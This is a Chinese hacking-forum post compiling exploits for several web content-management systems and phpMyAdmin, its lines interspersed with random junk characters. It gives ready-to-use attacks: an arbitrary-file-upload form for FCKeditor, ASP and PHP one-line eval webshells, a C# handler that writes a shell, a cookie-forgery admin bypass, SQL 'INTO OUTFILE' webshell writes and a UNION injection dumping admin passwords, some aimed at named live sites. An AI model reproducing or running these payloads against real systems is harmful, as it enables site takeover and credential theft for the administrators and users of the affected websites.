跳转到网站根目录上传任意文件。
# x/ i8 D2 [, c: f& M# r6 e! e如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件2 a9 e$ }# W/ ?* x% d1 K& z5 d
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">$ r, h6 `" w/ Q# L- R
Upload a new file:<br>
9 ^) F9 g5 R% v0 l, U; p( |9 B0 |<input type="file" name="NewFile" size="50"><br>
?5 \5 D( n- R<input id="btnUpload" type="submit" value="Upload">
9 |% B5 V* \; `6 B& ?</form>
6 b& ?' m5 s# h% q-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" r% W1 y4 [- H6 T7 o& o
+ q4 k9 x* T$ V3 L2 j2 o! K L" _SDcms 后台拿webshell9 K/ {, b' K. J S4 Z
( t6 a: w+ ?% |6 C) m
第一种方法:
6 {6 h# b2 L b) S% V8 ?& w进入后台-->系统管理-->系统设置-->系统设置->网站名称;
/ b- g2 @9 Y- P+ E+ m把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx$ |# R% |( S+ o) o/ }
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。: z+ V2 f: w7 e
第二种方法:% l8 z p0 r0 F% V. g
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
5 T) k! k0 \6 i3 b# l4 T T在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!9 w' s$ f% {5 Q" X1 G# z
第三种方法:, F, b# P* s# L- c9 K
进入后台-->界面管理-->模板文件管理-->创建文件+ {( \' U# ~" g: N4 D" s t
文件名写入getshell.ashx
0 X g/ g- |6 G O! }& L内容写入下面内容:
' b% o( v! ?0 W$ G, n6 r8 r9 T" }/====================复制下面的=========================/, C1 k @6 M0 p5 d1 P+ o
<%@ WebHandler Language="C#" Class="Handler" %>! W4 s- K" t' t- C+ H! r. [, I
using System;
, H6 W% C* i' q ~ N8 xusing System.Web;
- w: e9 S' N4 w9 o( X& Busing System.IO;
1 {5 {8 z: w; k8 r3 @( Cpublic class Handler : IHttpHandler {
6 E+ D5 G6 L9 C8 O( Y* @8 cpublic void ProcessRequest (HttpContext context) {
: Y$ {( D. W$ Dcontext.Response.ContentType = "text/plain";
3 I: s* k( t* n+ z5 i' J' bStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
: U$ _( r5 @; w% V( O5 Tfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");" R- c& x, R2 g+ @5 b
file1.Flush();
" Z3 _5 B. ~+ C4 ^' Efile1.Close();
+ }0 O4 ~$ A, B5 l}7 x+ D. ?5 t6 i! t$ L/ l! F
public bool IsReusable {8 S8 d5 i) Z7 d% t
get {
! a% }2 w2 r3 Q# Breturn false;
( h: \! F( `* e6 x}
' L' J# J" [6 O; v% M}
2 E# \3 t7 B0 o- E- @' @$ K}% z/ R4 r1 B/ _% q9 j" G
/=============================================/
$ Q/ x8 D5 o& _# t/ n访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx1 i b! r) Z. C( h
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
0 J- A) z- h' Z; Z; h; _-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- ^2 B1 Q% O: |) q7 `" c' D& q9 e2 S: v! p; Z. V& p1 x3 [
ESCMS网站管理系统0day
, |7 z d( ~& b" h9 ? ^0 ]8 r; I! B: O4 a6 h& T
后台登陆验证是通过admin/check.asp实现的
- ?0 U u% h! |- X, ]" f( D% m: Q
5 L& z( `3 x. H+ E: y$ ]/ ]首先我们打开http://target.com/admin/es_index.html
' d8 {. U* V) e4 v4 i然后在COOKIE结尾加上' |! n$ z/ d# R7 p, R* e6 }. D
; ESCMS$_SP2=ES_admin=st0p;
: v1 U" t7 K6 V Z) Y修改,然后刷新
: y N: i0 ]2 s, L: k. ]进后台了嘎..
$ d; ?) M, [. K然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL* H7 a1 R! i8 u
! n: d$ S! n& i' [7 g8 H) ? Z; s利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
9 j$ l# L9 c& ~# R嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp; P0 V6 I( H6 @, o1 c, w
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..% L$ b' i% q7 q1 ^
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了, x7 |( W$ V4 y1 E# J( `. ?
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, I+ d' d* T7 S4 f n" @: s7 y: K+ G+ B, |& n+ T! b; M
宁志网站管理系统后台无验证漏洞及修复
j1 Q* [# p$ {% i2 ~- A& `0 L* l8 W- R" b% z3 s2 H& y
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
5 ^5 V" P7 I% ?9 k+ ~2 N官方网站:www.ningzhi.net
% d# Y6 k# b& [. r0 x4 M: ?, c学校网站管理系统 V.2011版本
5 e! e7 _! M6 q$ J, z5 _http://down.chinaz.com/soft/29943.htm
9 f. z; [/ o9 n$ Z5 H$ J其它版本(如:政府版等),自行下载.
, s3 D5 _( @' Q漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
, T: ^ i. B4 l7 W1 P9 Y% Ilogin.asp代码如下:
; F: \' |4 O$ B3 M* S4 Z<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> . U3 w( [8 m) |3 k/ o! d2 L# w9 ]
manage.asp代码我就不帖出来了.反正也没验证.
7 l5 m: W) x7 n只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
" e: r' U/ Q+ ?: h漏洞利用:
- K, e4 T. K9 ~# g8 i直接访问http://www.0855.tv/admin/manage.asp
, H9 K3 k+ f+ d5 L. K数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
' [7 |* L4 w- V% a, Q. d----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 c) _& A* Q" [) v
1 P- N3 l' q J* K: t3 ]5 Aphpmyadmin拿shell的四种方法总结及修复
$ G2 @' t# S6 j8 l) h7 l$ A1 D9 `( e& w
方法一:
u1 i' R' H* Z8 `( r) H! |CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
! V7 \7 Q: w! c# @" MINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
( t; J0 X0 ^, M1 ~2 ?" |SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';( p, \7 {+ B7 l: D* r. F
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php( ]4 B/ s- T, u2 \# Y% R
一句话连接密码:7on
@) y) u% y8 z+ C' N7 Y7 `方法二:3 G* U5 m4 N7 z9 T9 e+ C
读取文件内容: select load_file('E:/xamp/www/s.php');& T5 J* Q3 ~) i, U
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php': w0 s+ Z6 W. T2 {1 x3 Z( [
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
, N+ G' W) f0 A/ s( @方法三:
9 n h1 e$ p5 sJhackJ版本 PHPmyadmin拿shell2 X/ r- }( o; l, R4 s) I+ n: i: G1 {
Create TABLE study (cmd text NOT NULL);& t" K9 ~- l' f* O( H9 T6 W6 p
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');* k5 L/ O% \* K/ i! A& S
select cmd from study into outfile 'E:/wamp/www/7.php';
1 z* I1 J& p2 X* x5 C+ \# \8 CDrop TABLE IF EXISTS study;
/ x. s2 x* R6 I: g* s<?php eval($_POST[cmd])?>' p; l, B0 b: B3 K& W" ]
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
4 X2 q9 t9 |4 Q$ i8 u2 v' QINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
: }& I/ K+ b4 K NSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
3 J9 Z+ ~( e3 I7 f% w% b' |4 oDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
: l+ p0 g m7 q, n4 y8 V方法四:
! p4 `8 \% f' o3 j. |- f7 Pselect load_file('E:/xamp/www/study.php');
: q6 H2 J. \4 b# hselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
; o' Y2 E' }6 a' a) P; a+ t然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
( W- j$ n; P2 y-----------------------------------------------------------------------------------------------------------------------------------------------------------------------( {9 Y2 V) x" E& N: A
& @+ _. Q( @1 t0 N9 c7 qNO.001中学网站管理系统 Build 110628 注入漏洞0 B5 z; P! ?- e1 |- u5 F7 T: ?4 x8 \( L
/ T- I6 `6 ?5 P, w# }' wNO.001中学网站管理系统功能模块:" T. W1 N) F( }) y& V$ i
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
0 _2 h- I; K" [" w2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
1 o& x& p8 P, R) v3 {" M _6 a& s" T3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息8 n$ p9 A7 i4 y8 h
4.视频图片管理:一级分类,动态添加视频或者图片等信息
( W4 r. c/ W x& F! W5.留言管理:对留言,修改,删除、回复等管理
& a5 v: }& x5 P( W; e* @( X# h6.校友频道:包括校友资料excel导出、管理等功能
* B7 a" c) w$ u. _7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
) L& a0 ~% ]4 N9 W; i3 `: F( c+ d默认后台:admin/login.asp V: a; f3 F" n' `- f7 ?+ m- Z
官方演示:http://demo.001cms.net6 ?" u' B% P" U6 c
源码下载地址:http://down.chinaz.com/soft/30187.htm
8 W' r M/ T- F0 f1 N* t2 |4 @EXP:
$ F6 L1 e4 c4 {6 Kunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
, O5 `( i! T: {# H* B/ S测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin# r' _ u) m5 v/ L ^$ y
getshell:后台有备份,你懂的
: I# u* W; F8 Y2 C另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
6 I2 A, S. \3 o/ U------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对